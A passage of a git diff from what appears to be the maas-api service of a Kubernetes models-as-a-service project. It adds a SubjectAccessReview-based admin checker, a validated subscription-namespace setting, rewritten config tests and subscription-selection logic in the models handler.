checker.GetAdminGroups() - require.Error(t, err) - assert.Nil(t, groups) - assert.Contains(t, err.Error(), "adminGroups field not found") - }) - - t.Run("EmptyAdminGroups", func(t *testing.T) { - authCR := createAuthCR([]string{}) - lister := &mockAuthLister{authCR: authCR} - checker := auth.NewAdminChecker(lister) - - groups, err := checker.GetAdminGroups() - require.NoError(t, err) - assert.Empty(t, groups, "empty admin groups should be allowed (Auth CR validation handles minimum)") - }) -} diff --git a/maas-api/internal/auth/sar_admin_checker.go b/maas-api/internal/auth/sar_admin_checker.go new file mode 100644 index 000000000..b5544fc6c --- /dev/null +++ b/maas-api/internal/auth/sar_admin_checker.go @@ -0,0 +1,66 @@ +package auth + +import ( + "context" + "log/slog" + + authv1 "k8s.io/api/authorization/v1" + metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" + "k8s.io/client-go/kubernetes" + + "github.com/opendatahub-io/models-as-a-service/maas-api/internal/token" +) + +// SARAdminChecker checks admin status via Kubernetes SubjectAccessReview. +// Admin is defined as: can create maasauthpolicies in the MaaS namespace. +// This aligns with RBAC from opendatahub-operator#3301 which grants admin groups +// CRUD access to MaaSAuthPolicy and MaaSSubscription resources. +type SARAdminChecker struct { + client kubernetes.Interface + namespace string +} + +// NewSARAdminChecker creates a SAR-based admin checker. +// The namespace parameter specifies where maasauthpolicies are checked. +func NewSARAdminChecker(client kubernetes.Interface, namespace string) *SARAdminChecker { + if client == nil { + panic("client cannot be nil for SARAdminChecker") + } + if namespace == "" { + panic("namespace cannot be empty for SARAdminChecker") + } + return &SARAdminChecker{ + client: client, + namespace: namespace, + } +} + +// IsAdmin checks if the user can create maasauthpolicies in the configured namespace. +// This is a proxy for "is this user an admin" based on RBAC permissions. 
+// Returns false (fail-closed) if the check cannot be performed. +func (s *SARAdminChecker) IsAdmin(ctx context.Context, user *token.UserContext) bool { + if s == nil || s.client == nil || user == nil || user.Username == "" { + return false + } + + sar := &authv1.SubjectAccessReview{ + Spec: authv1.SubjectAccessReviewSpec{ + User: user.Username, + Groups: user.Groups, + ResourceAttributes: &authv1.ResourceAttributes{ + Namespace: s.namespace, + Verb: "create", + Group: "maas.opendatahub.io", + Resource: "maasauthpolicies", + }, + }, + } + + result, err := s.client.AuthorizationV1().SubjectAccessReviews().Create(ctx, sar, metav1.CreateOptions{}) + if err != nil { + slog.Warn("SAR admin check failed", "error", err.Error()) + return false + } + + return result.Status.Allowed +} diff --git a/maas-api/internal/auth/sar_admin_checker_test.go b/maas-api/internal/auth/sar_admin_checker_test.go new file mode 100644 index 000000000..a0b2a345e --- /dev/null +++ b/maas-api/internal/auth/sar_admin_checker_test.go @@ -0,0 +1,145 @@ +package auth_test + +import ( + "context" + "testing" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + authv1 "k8s.io/api/authorization/v1" + "k8s.io/apimachinery/pkg/runtime" + "k8s.io/client-go/kubernetes/fake" + k8stesting "k8s.io/client-go/testing" + + "github.com/opendatahub-io/models-as-a-service/maas-api/internal/auth" + "github.com/opendatahub-io/models-as-a-service/maas-api/internal/token" +) + +func TestSARAdminChecker_IsAdmin(t *testing.T) { + const testNamespace = "models-as-a-service" + + t.Run("AdminUserAllowed", func(t *testing.T) { + client := fake.NewSimpleClientset() + client.PrependReactor("create", "subjectaccessreviews", func(action k8stesting.Action) (bool, runtime.Object, error) { + sar, ok := action.(k8stesting.CreateAction).GetObject().(*authv1.SubjectAccessReview) + require.True(t, ok) + sar.Status.Allowed = true + return true, sar, nil + }) + + checker := auth.NewSARAdminChecker(client, 
testNamespace) + user := &token.UserContext{Username: "admin-user", Groups: []string{"admin-group"}} + + assert.True(t, checker.IsAdmin(context.Background(), user)) + }) + + t.Run("RegularUserDenied", func(t *testing.T) { + client := fake.NewSimpleClientset() + client.PrependReactor("create", "subjectaccessreviews", func(action k8stesting.Action) (bool, runtime.Object, error) { + sar, ok := action.(k8stesting.CreateAction).GetObject().(*authv1.SubjectAccessReview) + require.True(t, ok) + sar.Status.Allowed = false + return true, sar, nil + }) + + checker := auth.NewSARAdminChecker(client, testNamespace) + user := &token.UserContext{Username: "regular-user", Groups: []string{"users"}} + + assert.False(t, checker.IsAdmin(context.Background(), user)) + }) + + t.Run("NilUserReturnsFalse", func(t *testing.T) { + client := fake.NewSimpleClientset() + checker := auth.NewSARAdminChecker(client, testNamespace) + + assert.False(t, checker.IsAdmin(context.Background(), nil)) + }) + + t.Run("EmptyUsernameReturnsFalse", func(t *testing.T) { + client := fake.NewSimpleClientset() + checker := auth.NewSARAdminChecker(client, testNamespace) + user := &token.UserContext{Username: "", Groups: []string{"admin-group"}} + + assert.False(t, checker.IsAdmin(context.Background(), user)) + }) + + t.Run("NilCheckerReturnsFalse", func(t *testing.T) { + var checker *auth.SARAdminChecker + user := &token.UserContext{Username: "admin-user", Groups: []string{"admin-group"}} + + assert.False(t, checker.IsAdmin(context.Background(), user)) + }) + + t.Run("NilClientPanics", func(t *testing.T) { + assert.Panics(t, func() { + auth.NewSARAdminChecker(nil, testNamespace) + }) + }) + + t.Run("EmptyNamespacePanics", func(t *testing.T) { + client := fake.NewSimpleClientset() + assert.Panics(t, func() { + auth.NewSARAdminChecker(client, "") + }) + }) + + t.Run("APIErrorReturnsFalse_FailClosed", func(t *testing.T) { + client := fake.NewSimpleClientset() + client.PrependReactor("create", 
"subjectaccessreviews", func(action k8stesting.Action) (bool, runtime.Object, error) { + return true, nil, assert.AnError + }) + + checker := auth.NewSARAdminChecker(client, testNamespace) + user := &token.UserContext{Username: "admin-user", Groups: []string{"admin-group"}} + + assert.False(t, checker.IsAdmin(context.Background(), user), "should fail-closed on API error") + }) + + t.Run("VerifiesSARParameters", func(t *testing.T) { + client := fake.NewSimpleClientset() + var capturedSAR *authv1.SubjectAccessReview + client.PrependReactor("create", "subjectaccessreviews", func(action k8stesting.Action) (bool, runtime.Object, error) { + var ok bool + capturedSAR, ok = action.(k8stesting.CreateAction).GetObject().(*authv1.SubjectAccessReview) + require.True(t, ok) + capturedSAR.Status.Allowed = true + return true, capturedSAR, nil + }) + + checker := auth.NewSARAdminChecker(client, testNamespace) + user := &token.UserContext{Username: "alice", Groups: []string{"group1", "group2"}} + + checker.IsAdmin(context.Background(), user) + + require.NotNil(t, capturedSAR) + assert.Equal(t, "alice", capturedSAR.Spec.User) + assert.Equal(t, []string{"group1", "group2"}, capturedSAR.Spec.Groups) + assert.Equal(t, testNamespace, capturedSAR.Spec.ResourceAttributes.Namespace) + assert.Equal(t, "create", capturedSAR.Spec.ResourceAttributes.Verb) + assert.Equal(t, "maas.opendatahub.io", capturedSAR.Spec.ResourceAttributes.Group) + assert.Equal(t, "maasauthpolicies", capturedSAR.Spec.ResourceAttributes.Resource) + }) + + t.Run("CustomNamespace", func(t *testing.T) { + client := fake.NewSimpleClientset() + var capturedSAR *authv1.SubjectAccessReview + client.PrependReactor("create", "subjectaccessreviews", func(action k8stesting.Action) (bool, runtime.Object, error) { + var ok bool + capturedSAR, ok = action.(k8stesting.CreateAction).GetObject().(*authv1.SubjectAccessReview) + require.True(t, ok) + capturedSAR.Status.Allowed = true + return true, capturedSAR, nil + }) + + checker := 
auth.NewSARAdminChecker(client, "custom-namespace") + user := &token.UserContext{Username: "alice", Groups: []string{"users"}} + + checker.IsAdmin(context.Background(), user) + + require.NotNil(t, capturedSAR) + assert.Equal(t, "custom-namespace", capturedSAR.Spec.ResourceAttributes.Namespace) + assert.Equal(t, "create", capturedSAR.Spec.ResourceAttributes.Verb) + assert.Equal(t, "maas.opendatahub.io", capturedSAR.Spec.ResourceAttributes.Group) + assert.Equal(t, "maasauthpolicies", capturedSAR.Spec.ResourceAttributes.Resource) + }) +} diff --git a/maas-api/internal/config/cluster_config.go b/maas-api/internal/config/cluster_config.go index a8143100f..28b7878a0 100644 --- a/maas-api/internal/config/cluster_config.go +++ b/maas-api/internal/config/cluster_config.go @@ -6,7 +6,6 @@ import ( "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured" "k8s.io/apimachinery/pkg/labels" - "k8s.io/apimachinery/pkg/runtime/schema" "k8s.io/client-go/dynamic" "k8s.io/client-go/dynamic/dynamicinformer" "k8s.io/client-go/informers" @@ -34,8 +33,9 @@ type ClusterConfig struct { // MaaSSubscriptionLister lists MaaSSubscription CRs from the informer cache for subscription selection. MaaSSubscriptionLister subscription.Lister - // AdminChecker checks if a user is an admin based on Auth CR (services.opendatahub.io/v1alpha1). - AdminChecker *auth.AdminChecker + // AdminChecker uses SubjectAccessReview to check if a user is an admin. + // Admin is determined by RBAC: can user create maasauthpolicies in the configured MaaS namespace? 
+ AdminChecker *auth.SARAdminChecker informersSynced []cache.InformerSynced startFuncs []func(<-chan struct{}) @@ -46,7 +46,7 @@ type maasModelRefLister struct { lister cache.GenericLister } -func (m *maasModelRefLister) List(namespace string) ([]*unstructured.Unstructured, error) { +func (m *maasModelRefLister) List() ([]*unstructured.Unstructured, error) { objs, err := m.lister.List(labels.Everything()) if err != nil { return nil, err @@ -57,9 +57,7 @@ func (m *maasModelRefLister) List(namespace string) ([]*unstructured.Unstructure if !ok { continue } - if namespace != "" && u.GetNamespace() != namespace { - continue - } + // Return all MaaSModelRefs from all namespaces (no filtering) out = append(out, u) } return out, nil @@ -86,7 +84,7 @@ func (s *subscriptionLister) List() ([]*unstructured.Unstructured, error) { return out, nil } -func NewClusterConfig(namespace string, resyncPeriod time.Duration) (*ClusterConfig, error) { +func NewClusterConfig(namespace, subscriptionNamespace string, resyncPeriod time.Duration) (*ClusterConfig, error) { restConfig, err := LoadRestConfig() if err != nil { return nil, fmt.Errorf("failed to create kubernetes config: %w", err) @@ -115,20 +113,16 @@ func NewClusterConfig(namespace string, resyncPeriod time.Duration) (*ClusterCon maasInformer := maasDynamicFactory.ForResource(maasGVR) maasModelRefListerVal := &maasModelRefLister{lister: maasInformer.Lister()} - // MaaSSubscription informer (cached); watches all namespaces for subscription selection. + // MaaSSubscription informer (cached); watches only the configured namespace for subscription selection. 
+ subscriptionDynamicFactory := dynamicinformer.NewFilteredDynamicSharedInformerFactory(dynamicClient, resyncPeriod, subscriptionNamespace, nil) subscriptionGVR := subscription.GVR() - subscriptionInformer := maasDynamicFactory.ForResource(subscriptionGVR) + subscriptionInformer := subscriptionDynamicFactory.ForResource(subscriptionGVR) maasSubscriptionListerVal := &subscriptionLister{lister: subscriptionInformer.Lister()} - // Auth CR informer (cluster-scoped); used to determine admin groups from services.platform.opendatahub.io/v1alpha1/Auth. - // The Auth CR is a singleton named "auth" that defines adminGroups and allowedGroups. - authGVR := schema.GroupVersionResource{ - Group: "services.platform.opendatahub.io", - Version: "v1alpha1", - Resource: "auths", - } - authInformer := maasDynamicFactory.ForResource(authGVR) - adminCheckerVal := auth.NewAdminChecker(authInformer.Lister()) + // SAR-based admin checker: uses SubjectAccessReview to check RBAC permissions. + // Admin is determined by: can user create maasauthpolicies in the MaaS namespace? + // This aligns with RBAC from opendatahub-operator#3301 which grants admin groups CRUD access to MaaS resources. 
+ adminCheckerVal := auth.NewSARAdminChecker(clientset, subscriptionNamespace) return &ClusterConfig{ ClientSet: clientset, @@ -147,12 +141,12 @@ func NewClusterConfig(namespace string, resyncPeriod time.Duration) (*ClusterCon saInformer.Informer().HasSynced, maasInformer.Informer().HasSynced, subscriptionInformer.Informer().HasSynced, - authInformer.Informer().HasSynced, }, startFuncs: []func(<-chan struct{}){ coreFactory.Start, coreFactoryNs.Start, maasDynamicFactory.Start, + subscriptionDynamicFactory.Start, }, }, nil } diff --git a/maas-api/internal/config/config.go b/maas-api/internal/config/config.go index b7eb32815..3c9627163 100644 --- a/maas-api/internal/config/config.go +++ b/maas-api/internal/config/config.go @@ -5,8 +5,10 @@ import ( "errors" "flag" "fmt" + "strings" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" + "k8s.io/apimachinery/pkg/util/validation" "k8s.io/client-go/kubernetes" "k8s.io/utils/env" @@ -26,6 +28,8 @@ type Config struct { GatewayName string GatewayNamespace string + MaaSSubscriptionNamespace string + // Server configuration Address string // Listen address for HTTPS (host:port) Secure bool // Use HTTPS @@ -37,10 +41,6 @@ type Config struct { // Format: postgresql://user:password@host:port/database DBConnectionURL string - // APIKeyExpirationPolicy controls whether API keys must have expiration - // Values: "optional" (default) or "required" - APIKeyExpirationPolicy string - // APIKeyMaxExpirationDays is the maximum allowed expiration in days for API keys. // Users cannot create API keys with expiration longer than this value. // Default: 30 days. Minimum: 1 day. 
@@ -58,17 +58,17 @@ func Load() *Config { maxExpirationDays, _ := env.GetInt("API_KEY_MAX_EXPIRATION_DAYS", constant.DefaultAPIKeyMaxExpirationDays) c := &Config{ - Name: env.GetString("INSTANCE_NAME", gatewayName), - Namespace: env.GetString("NAMESPACE", constant.DefaultNamespace), - GatewayName: gatewayName, - GatewayNamespace: env.GetString("GATEWAY_NAMESPACE", constant.DefaultGatewayNamespace), - Address: env.GetString("ADDRESS", ""), - Secure: secure, - TLS: loadTLSConfig(), - DebugMode: debugMode, - DBConnectionURL: "", // Loaded from K8s secret via LoadDatabaseURL() - APIKeyExpirationPolicy: env.GetString("API_KEY_EXPIRATION_POLICY", "optional"), - APIKeyMaxExpirationDays: maxExpirationDays, + Name: env.GetString("INSTANCE_NAME", gatewayName), + Namespace: env.GetString("NAMESPACE", constant.DefaultNamespace), + GatewayName: gatewayName, + GatewayNamespace: env.GetString("GATEWAY_NAMESPACE", constant.DefaultGatewayNamespace), + MaaSSubscriptionNamespace: env.GetString("MAAS_SUBSCRIPTION_NAMESPACE", constant.DefaultMaaSSubscriptionNamespace), + Address: env.GetString("ADDRESS", ""), + Secure: secure, + TLS: loadTLSConfig(), + DebugMode: debugMode, + DBConnectionURL: "", // Loaded from K8s secret via LoadDatabaseURL() + APIKeyMaxExpirationDays: maxExpirationDays, // Deprecated env var (backward compatibility with pre-TLS version) deprecatedHTTPPort: env.GetString("PORT", ""), } @@ -84,6 +84,7 @@ func (c *Config) bindFlags(fs *flag.FlagSet) { fs.StringVar(&c.Namespace, "namespace", c.Namespace, "Namespace of the MaaS instance") fs.StringVar(&c.GatewayName, "gateway-name", c.GatewayName, "Name of the Gateway that has MaaS capabilities") fs.StringVar(&c.GatewayNamespace, "gateway-namespace", c.GatewayNamespace, "Namespace where MaaS-enabled Gateway is deployed") + fs.StringVar(&c.MaaSSubscriptionNamespace, "maas-subscription-namespace", c.MaaSSubscriptionNamespace, "Namespace where MaaSSubscription CRs are located") fs.StringVar(&c.Address, "address", c.Address, 
"HTTPS listen address (default :8443)") fs.BoolVar(&c.Secure, "secure", c.Secure, "Use HTTPS (default: false)") @@ -128,9 +129,11 @@ func (c *Config) Validate() error { } } - // Validate API key expiration policy - if c.APIKeyExpirationPolicy != "optional" && c.APIKeyExpirationPolicy != "required" { - return errors.New("API_KEY_EXPIRATION_POLICY must be 'optional' or 'required'") + if strings.TrimSpace(c.MaaSSubscriptionNamespace) == "" { + return errors.New("MAAS_SUBSCRIPTION_NAMESPACE must be non-empty") + } + if errs := validation.IsDNS1123Label(c.MaaSSubscriptionNamespace); len(errs) > 0 { + return fmt.Errorf("MAAS_SUBSCRIPTION_NAMESPACE %q is invalid: %v", c.MaaSSubscriptionNamespace, errs) } // Validate API key max expiration days diff --git a/maas-api/internal/config/config_test.go b/maas-api/internal/config/config_test.go index a22ddbb2a..4d4958409 100644 --- a/maas-api/internal/config/config_test.go +++ b/maas-api/internal/config/config_test.go @@ -1,81 +1,266 @@ -package config_test +package config //nolint:testpackage // tests access unexported fields import ( + "crypto/tls" + "flag" + "os" + "strings" "testing" - - "github.com/opendatahub-io/models-as-a-service/maas-api/internal/config" ) -func TestConfig_Validate_APIKeyMaxExpirationDays(t *testing.T) { +const testGatewayName = "my-gateway" + +// resetGlobalFlags replaces flag.CommandLine with a fresh FlagSet so that +// Load() can register its flags again without panicking. 
+func resetGlobalFlags() { + flag.CommandLine = flag.NewFlagSet(os.Args[0], flag.ContinueOnError) +} + +func TestLoad_EnvironmentVariables(t *testing.T) { tests := []struct { - name string - maxDays int - wantError bool - errorMsg string + name string + envVars map[string]string + check func(t *testing.T, cfg *Config) }{ { - name: "valid minimum value", - maxDays: 1, - wantError: false, + name: "GATEWAY_NAME overrides GatewayName and Name defaults to it", + envVars: map[string]string{"GATEWAY_NAME": testGatewayName}, + check: func(t *testing.T, cfg *Config) { + t.Helper() + if cfg.GatewayName != testGatewayName { + t.Errorf("expected GatewayName %q, got %q", testGatewayName, cfg.GatewayName) + } + // Name defaults to GatewayName when INSTANCE_NAME is not set + if cfg.Name != testGatewayName { + t.Errorf("expected Name to default to GatewayName %q, got %q", testGatewayName, cfg.Name) + } + }, + }, + { + name: "INSTANCE_NAME and GATEWAY_NAME set independently", + envVars: map[string]string{"INSTANCE_NAME": "my-instance", "GATEWAY_NAME": testGatewayName}, + check: func(t *testing.T, cfg *Config) { + t.Helper() + if cfg.Name != "my-instance" { + t.Errorf("expected Name 'my-instance', got %q", cfg.Name) + } + if cfg.GatewayName != testGatewayName { + t.Errorf("expected GatewayName %q, got %q", testGatewayName, cfg.GatewayName) + } + }, + }, + } + + // All env vars that Load() reads, to be cleared before each subtest. + allEnvVars := []string{ + "DEBUG_MODE", "GATEWAY_NAME", "SECURE", "INSTANCE_NAME", + "NAMESPACE", "GATEWAY_NAMESPACE", "ADDRESS", + "PORT", + "TLS_CERT", "TLS_KEY", "TLS_SELF_SIGNED", + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + resetGlobalFlags() + + // Clear all config env vars first. + for _, key := range allEnvVars { + t.Setenv(key, "") + os.Unsetenv(key) + } + + // Set the test-specific env vars. 
+ for key, val := range tt.envVars { + t.Setenv(key, val) + } + + cfg := Load() + tt.check(t, cfg) + }) + } +} + +// TestValidate covers Config.Validate: +// required fields (DBConnectionURL), +// TLS consistency (secure without certs, cert without key), +// APIKeyMaxExpirationDays bounds, +// and default address assignment. +func TestValidate(t *testing.T) { + tests := []struct { + name string + cfg Config + expectError string + }{ + { + name: "missing DBConnectionURL returns error", + cfg: Config{ + DBConnectionURL: "", + }, + expectError: "db connection URL is required", + }, + { + name: "secure without TLS returns error", + cfg: Config{ + DBConnectionURL: "postgresql://localhost/test", + Secure: true, + }, + expectError: "--secure requires either --tls-cert/--tls-key or --tls-self-signed", }, { - name: "valid default value", - maxDays: 30, - wantError: false, + name: "TLS cert without key returns error", + cfg: Config{ + DBConnectionURL: "postgresql://localhost/test", + TLS: TLSConfig{Cert: "/cert.pem"}, + }, + expectError: "--tls-cert and --tls-key must both be provided together", }, { - name: "valid large value", - maxDays: 365, - wantError: false, + name: "valid insecure config sets default address :8080", + cfg: Config{ + DBConnectionURL: "postgresql://localhost/test", + Secure: false, + APIKeyMaxExpirationDays: 30, + MaaSSubscriptionNamespace: "models-as-a-service", + }, }, { - name: "invalid zero value", - maxDays: 0, - wantError: true, - errorMsg: "must be at least 1", + name: "valid secure config with self-signed sets default address :8443", + cfg: Config{ + DBConnectionURL: "postgresql://localhost/test", + TLS: TLSConfig{SelfSigned: true, MinVersion: TLSVersion(tls.VersionTLS12)}, + APIKeyMaxExpirationDays: 30, + MaaSSubscriptionNamespace: "models-as-a-service", + }, }, { - name: "invalid negative value", - maxDays: -1, - wantError: true, - errorMsg: "must be at least 1", + name: "valid secure config with certs", + cfg: Config{ + DBConnectionURL: 
"postgresql://localhost/test", + TLS: TLSConfig{Cert: "/cert.pem", Key: "/key.pem", MinVersion: TLSVersion(tls.VersionTLS12)}, + APIKeyMaxExpirationDays: 30, + MaaSSubscriptionNamespace: "models-as-a-service", + }, + }, + { + name: "APIKeyMaxExpirationDays valid minimum value", + cfg: Config{ + DBConnectionURL: "postgresql://localhost/test", + APIKeyMaxExpirationDays: 1, + MaaSSubscriptionNamespace: "models-as-a-service", + }, + }, + { + name: "APIKeyMaxExpirationDays valid default value", + cfg: Config{ + DBConnectionURL: "postgresql://localhost/test", + APIKeyMaxExpirationDays: 30, + MaaSSubscriptionNamespace: "models-as-a-service", + }, + }, + { + name: "APIKeyMaxExpirationDays valid large value", + cfg: Config{ + DBConnectionURL: "postgresql://localhost/test", + APIKeyMaxExpirationDays: 365, + MaaSSubscriptionNamespace: "models-as-a-service", + }, + }, + { + name: "APIKeyMaxExpirationDays zero returns error", + cfg: Config{ + DBConnectionURL: "postgresql://localhost/test", + APIKeyMaxExpirationDays: 0, + MaaSSubscriptionNamespace: "models-as-a-service", + }, + expectError: "must be at least 1", + }, + { + name: "APIKeyMaxExpirationDays negative returns error", + cfg: Config{ + DBConnectionURL: "postgresql://localhost/test", + APIKeyMaxExpirationDays: -1, + MaaSSubscriptionNamespace: "models-as-a-service", + }, + expectError: "must be at least 1", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { - c := &config.Config{ - DBConnectionURL: "postgresql://test:test@localhost/test", - APIKeyExpirationPolicy: "optional", - APIKeyMaxExpirationDays: tt.maxDays, - } + // Clear TLS_MIN_VERSION to avoid interference from host environment. 
+ t.Setenv("TLS_MIN_VERSION", "") + os.Unsetenv("TLS_MIN_VERSION") - err := c.Validate() + err := tt.cfg.Validate() - if tt.wantError { + if tt.expectError != "" { if err == nil { - t.Errorf("expected error containing %q, got nil", tt.errorMsg) - return + t.Fatalf("expected error containing %q, got nil", tt.expectError) + } + if !strings.Contains(err.Error(), tt.expectError) { + t.Errorf("expected error containing %q, got %q", tt.expectError, err.Error()) + } + return + } + + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + + // Verify default address assignment for valid configs. + if tt.cfg.Secure { + if tt.cfg.Address != DefaultSecureAddr { + t.Errorf("expected Address %q for secure config, got %q", DefaultSecureAddr, tt.cfg.Address) } - if tt.errorMsg != "" && !contains(err.Error(), tt.errorMsg) { - t.Errorf("expected error containing %q, got %q", tt.errorMsg, err.Error()) + } else { + if tt.cfg.Address != DefaultInsecureAddr { + t.Errorf("expected Address %q for insecure config, got %q", DefaultInsecureAddr, tt.cfg.Address) } - } else if err != nil { - t.Errorf("unexpected error: %v", err) } }) } } -func contains(s, substr string) bool { - return len(s) >= len(substr) && (s == substr || len(s) > 0 && containsAt(s, substr)) -} +func TestHandleDeprecatedFlags(t *testing.T) { + t.Run("deprecated port sets Address and clears Secure", func(t *testing.T) { + cfg := &Config{ + Secure: true, + deprecatedHTTPPort: "9090", + } + cfg.handleDeprecatedFlags() -func containsAt(s, substr string) bool { - for i := 0; i <= len(s)-len(substr); i++ { - if s[i:i+len(substr)] == substr { - return true + if cfg.Secure { + t.Error("expected Secure to be false when deprecated port is used") } - } - return false + if cfg.Address != ":9090" { + t.Errorf("expected Address ':9090', got %q", cfg.Address) + } + }) + + t.Run("deprecated port does not override existing Address", func(t *testing.T) { + cfg := &Config{ + Address: ":7777", + deprecatedHTTPPort: "9090", + } + 
cfg.handleDeprecatedFlags() + + if cfg.Address != ":7777" { + t.Errorf("expected Address ':7777' to be preserved, got %q", cfg.Address) + } + }) + + t.Run("no deprecated port is a no-op", func(t *testing.T) { + cfg := &Config{ + Secure: true, + Address: ":8443", + } + cfg.handleDeprecatedFlags() + + if !cfg.Secure { + t.Error("expected Secure to remain true") + } + if cfg.Address != ":8443" { + t.Errorf("expected Address ':8443', got %q", cfg.Address) + } + }) } diff --git a/maas-api/internal/constant/const.go b/maas-api/internal/constant/const.go index db5ec10a9..0fdd064d3 100644 --- a/maas-api/internal/constant/const.go +++ b/maas-api/internal/constant/const.go @@ -3,10 +3,11 @@ package constant import "time" const ( - TierMappingConfigMap = "tier-to-group-mapping" - DefaultNamespace = "maas-api" - DefaultGatewayName = "maas-default-gateway" - DefaultGatewayNamespace = "openshift-ingress" + TierMappingConfigMap = "tier-to-group-mapping" + DefaultNamespace = "maas-api" + DefaultGatewayName = "maas-default-gateway" + DefaultGatewayNamespace = "openshift-ingress" + DefaultMaaSSubscriptionNamespace = "models-as-a-service" DefaultResyncPeriod = 8 * time.Hour @@ -16,10 +17,11 @@ const ( // API Key configuration defaults. // DefaultAPIKeyMaxExpirationDays is the default maximum allowed expiration for API keys. - DefaultAPIKeyMaxExpirationDays = 30 + DefaultAPIKeyMaxExpirationDays = 90 // LLMInferenceService annotation keys for model metadata. 
- AnnotationGenAIUseCase = "opendatahub.io/genai-use-case" - AnnotationDescription = "openshift.io/description" - AnnotationDisplayName = "openshift.io/display-name" + AnnotationGenAIUseCase = "opendatahub.io/genai-use-case" + AnnotationDescription = "openshift.io/description" + AnnotationDisplayName = "openshift.io/display-name" + AnnotationContextWindow = "opendatahub.io/context-window" ) diff --git a/maas-api/internal/handlers/models.go b/maas-api/internal/handlers/models.go index 55f58fdb0..e9dbf2bf1 100644 --- a/maas-api/internal/handlers/models.go +++ b/maas-api/internal/handlers/models.go @@ -3,6 +3,7 @@ package handlers import ( "errors" "net/http" + "sort" "strings" "github.com/gin-gonic/gin" @@ -20,7 +21,6 @@ type ModelsHandler struct { subscriptionSelector *subscription.Selector logger *logger.Logger maasModelRefLister models.MaaSModelRefLister - maasModelNamespace string } // NewModelsHandler creates a new models handler. @@ -30,7 +30,6 @@ func NewModelsHandler( modelMgr *models.Manager, subscriptionSelector *subscription.Selector, maasModelRefLister models.MaaSModelRefLister, - maasModelNamespace string, ) *ModelsHandler { if log == nil { log = logger.Production() @@ -40,10 +39,137 @@ func NewModelsHandler( subscriptionSelector: subscriptionSelector, logger: log, maasModelRefLister: maasModelRefLister, - maasModelNamespace: maasModelNamespace, } } +// selectSubscriptionsForListing determines which subscriptions to use for model listing. +// Returns the subscriptions list and a shouldReturn flag (true if the handler should return early). 
+func (h *ModelsHandler) selectSubscriptionsForListing( + c *gin.Context, + userContext *token.UserContext, + requestedSubscription string, + returnAllModels bool, +) ([]*subscription.SelectResponse, bool) { + if returnAllModels { + // User token authentication - return all models across all accessible subscriptions + if h.subscriptionSelector != nil { + allSubs, err := h.subscriptionSelector.GetAllAccessible(userContext.Groups, userContext.Username) + if err != nil { + h.logger.Error("Failed to get all accessible subscriptions", "error", err) + c.JSON(http.StatusInternalServerError, gin.H{ + "error": gin.H{ + "message": "Failed to get subscriptions", + "type": "server_error", + }}) + return nil, true + } + h.logger.Debug("User token - returning models from all accessible subscriptions", "subscriptionCount", len(allSubs)) + return allSubs, false + } + // No selector configured - cannot return all models + h.logger.Debug("Subscription selector not configured") + c.JSON(http.StatusInternalServerError, gin.H{ + "error": gin.H{ + "message": "Subscription system not configured", + "type": "server_error", + }}) + return nil, true + } + + // API key authentication - filter by the subscription bound to the key + if h.subscriptionSelector != nil { + //nolint:unqueryvet,nolintlint // Select is a method, not a SQL query + result, err := h.subscriptionSelector.Select(userContext.Groups, userContext.Username, requestedSubscription, "") + if err != nil { + h.handleSubscriptionSelectionError(c, err) + return nil, true + } + h.logger.Debug("API key - filtering by subscription", "subscription", result.Name) + return []*subscription.SelectResponse{result}, false + } + + // If no selector configured and no subscription header provided, return empty + // (don't create synthetic subscription metadata) + if requestedSubscription == "" { + return nil, false + } + + // Use the requested subscription header as-is (for legacy deployments without subscription selector) + return 
[]*subscription.SelectResponse{{Name: requestedSubscription}}, false +} + +// handleSubscriptionSelectionError handles errors from subscription selection and sends appropriate HTTP responses. +func (h *ModelsHandler) handleSubscriptionSelectionError(c *gin.Context, err error) { + var multipleSubsErr *subscription.MultipleSubscriptionsError + var accessDeniedErr *subscription.AccessDeniedError + var notFoundErr *subscription.SubscriptionNotFoundError + var noSubErr *subscription.NoSubscriptionError + + // For consistency with inferencing (which uses Authorino and returns 403 for all + // subscription errors), we return 403 Forbidden for all subscription-related errors. + if errors.As(err, &multipleSubsErr) { + // This should not happen with API keys (subscription is bound at mint time) + // If it does, it indicates the API key was minted without a subscription + h.logger.Debug("API key has no subscription bound - invalid state", + "subscriptionCount", len(multipleSubsErr.Subscriptions), + ) + c.JSON(http.StatusForbidden, gin.H{ + "error": gin.H{ + "message": "API key has no subscription bound", + "type": "permission_error", + }}) + return + } + + if errors.As(err, &accessDeniedErr) { + h.logger.Debug("Access denied to subscription") + c.JSON(http.StatusForbidden, gin.H{ + "error": gin.H{ + "message": err.Error(), + "type": "permission_error", + }}) + return + } + + if errors.As(err, ¬FoundErr) { + h.logger.Debug("Subscription not found") + c.JSON(http.StatusForbidden, gin.H{ + "error": gin.H{ + "message": err.Error(), + "type": "permission_error", + }}) + return + } + + if errors.As(err, &noSubErr) { + h.logger.Debug("No subscription found for user") + c.JSON(http.StatusForbidden, gin.H{ + "error": gin.H{ + "message": err.Error(), + "type": "permission_error", + }}) + return + } + + // Other errors are internal server errors + h.logger.Error("Subscription selection failed", "error", err) + c.JSON(http.StatusInternalServerError, gin.H{ + "error": gin.H{ + "message": 
"Failed to select subscription", + "type": "server_error", + }}) +} + +// addSubscriptionIfNew adds a subscription to the model's subscriptions array if not already present. +func (h *ModelsHandler) addSubscriptionIfNew(model *models.Model, subInfo models.SubscriptionInfo) { + for _, existingSub := range model.Subscriptions { + if existingSub.Name == subInfo.Name { + return + } + } + model.Subscriptions = append(model.Subscriptions, subInfo) +} + // ListLLMs handles GET /v1/models. func (h *ModelsHandler) ListLLMs(c *gin.Context) { // Require Authorization header and pass it through as-is to list and access validation. @@ -58,16 +184,32 @@ func (h *ModelsHandler) ListLLMs(c *gin.Context) { return } - // Extract x-maas-subscription header to pass through to model endpoints for authorization checks. - // This is required for users with multiple subscriptions. + // Extract x-maas-subscription header. + // For API keys: Authorino injects this from auth.metadata.apiKeyValidation.subscription + // For user tokens: This header is not present (Authorino doesn't inject it) requestedSubscription := strings.TrimSpace(c.GetHeader("x-maas-subscription")) + isAPIKeyRequest := strings.HasPrefix(authHeader, "Bearer sk-oai-") + + // Fail closed: API keys without a bound subscription must be rejected + if isAPIKeyRequest && requestedSubscription == "" { + h.logger.Debug("API key request missing bound subscription header") 